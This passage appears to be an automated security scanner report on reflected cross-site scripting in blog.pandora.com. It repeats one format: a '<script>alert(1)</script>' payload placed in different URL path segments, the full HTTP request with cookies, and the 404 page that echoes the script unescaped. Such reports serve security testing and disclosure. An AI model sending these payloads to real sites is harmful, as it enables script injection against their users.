<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorad931d<script>alert(1)</script>e8c0ddecb85/archives/2010/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b9c8<script>alert(1)</script>2807d91ee1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives1b9c8<script>alert(1)</script>2807d91ee1e/2010/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives1b9c8<script>alert(1)</script>2807d91ee1e/2010/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e09c9<script>alert(1)</script>d41b3d7ead was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010e09c9<script>alert(1)</script>d41b3d7ead/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010e09c9<script>alert(1)</script>d41b3d7ead/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b6267<script>alert(1)</script>bcd7c444884 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/08b6267<script>alert(1)</script>bcd7c444884/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/08b6267<script>alert(1)</script>bcd7c444884/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c939<script>alert(1)</script>b06104d0963 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9c939<script>alert(1)</script>b06104d0963/archives/2010/08/be-part-of-a-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9c939<script>alert(1)</script>b06104d0963/archives/2010/08/be-part-of-a-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b40c4<script>alert(1)</script>474a0312c0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesb40c4<script>alert(1)</script>474a0312c0d/2010/08/be-part-of-a-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesb40c4<script>alert(1)</script>474a0312c0d/2010/08/be-part-of-a-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aa222<script>alert(1)</script>1c5a4ab29c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010aa222<script>alert(1)</script>1c5a4ab29c9/08/be-part-of-a-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010aa222<script>alert(1)</script>1c5a4ab29c9/08/be-part-of-a-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79622<script>alert(1)</script>2b965e1ed52 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0879622<script>alert(1)</script>2b965e1ed52/be-part-of-a-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:05 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0879622<script>alert(1)</script>2b965e1ed52/be-part-of-a-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 39457<script>alert(1)</script>8f9246aff15 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/08/be-part-of-a-pa.html39457<script>alert(1)</script>8f9246aff15 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/08/be-part-of-a-pa.html39457<script>alert(1)</script>8f9246aff15 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92883<script>alert(1)</script>ae77c2b93bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora92883<script>alert(1)</script>ae77c2b93bf/archives/2010/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora92883<script>alert(1)</script>ae77c2b93bf/archives/2010/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0526<script>alert(1)</script>0f0e93964d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc0526<script>alert(1)</script>0f0e93964d2/2010/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc0526<script>alert(1)</script>0f0e93964d2/2010/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68e05<script>alert(1)</script>4497e666453 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/201068e05<script>alert(1)</script>4497e666453/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/201068e05<script>alert(1)</script>4497e666453/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42f15<script>alert(1)</script>866bd41379a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0942f15<script>alert(1)</script>866bd41379a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0942f15<script>alert(1)</script>866bd41379a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88323<script>alert(1)</script>dd84e5ab0d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora88323<script>alert(1)</script>dd84e5ab0d7/archives/2010/09/tim-on-cnbc-1.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 367 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora88323<script>alert(1)</script>dd84e5ab0d7/archives/2010/09/tim-on-cnbc-1.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd772<script>alert(1)</script>ee6bc22579c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivescd772<script>alert(1)</script>ee6bc22579c/2010/09/tim-on-cnbc-1.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:38 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivescd772<script>alert(1)</script>ee6bc22579c/2010/09/tim-on-cnbc-1.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 244d1<script>alert(1)</script>0057edf899 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010244d1<script>alert(1)</script>0057edf899/09/tim-on-cnbc-1.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 366
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010244d1<script>alert(1)</script>0057edf899/09/tim-on-cnbc-1.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 80718<script>alert(1)</script>b33c32116fb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0980718<script>alert(1)</script>b33c32116fb/tim-on-cnbc-1.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0980718<script>alert(1)</script>b33c32116fb/tim-on-cnbc-1.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7f010<script>alert(1)</script>db22de039d1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/09/tim-on-cnbc-1.html7f010<script>alert(1)</script>db22de039d1 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/09/tim-on-cnbc-1.html7f010<script>alert(1)</script>db22de039d1 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a980<script>alert(1)</script>ab4f3aefded was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora6a980<script>alert(1)</script>ab4f3aefded/archives/2010/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:23 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora6a980<script>alert(1)</script>ab4f3aefded/archives/2010/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9630<script>alert(1)</script>c4b6b39b005 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf9630<script>alert(1)</script>c4b6b39b005/2010/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf9630<script>alert(1)</script>c4b6b39b005/2010/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52dc5<script>alert(1)</script>f6f7326f783 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
